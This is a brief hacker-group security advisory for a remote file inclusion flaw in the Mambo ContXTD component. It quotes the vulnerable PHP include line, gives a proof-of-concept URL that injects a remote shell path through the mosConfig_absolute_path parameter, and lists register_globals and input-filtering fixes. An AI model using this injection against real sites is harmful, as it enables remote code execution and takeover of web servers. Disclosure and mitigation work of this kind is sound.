########################################################################################### # Aria-Security.net Advisory # # Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > # # Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp # # # ########################################################################################### #Software: Mambo Components ContXTD #Attack method: Remote File Inclusion #Source: ** ensure this file is being included by a parent file */ defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); include_once( $mosConfig_absolute_path .'/includes/vcard.class.php' ); ************************************************************************************ #Proof of Concept: # #www.site.com/contxtd/contxtd.class.php?mosConfig_absolute_path=SHELL # # # #Solutions : #1 - If you have access on webserver turn register_globals in php.ini off #2 - You must give a value before put the value of variable in the include function or check and filter #unnormal entrance out . # # #Contact : Outlaw@xxxxxxxxxxxxxxxxx
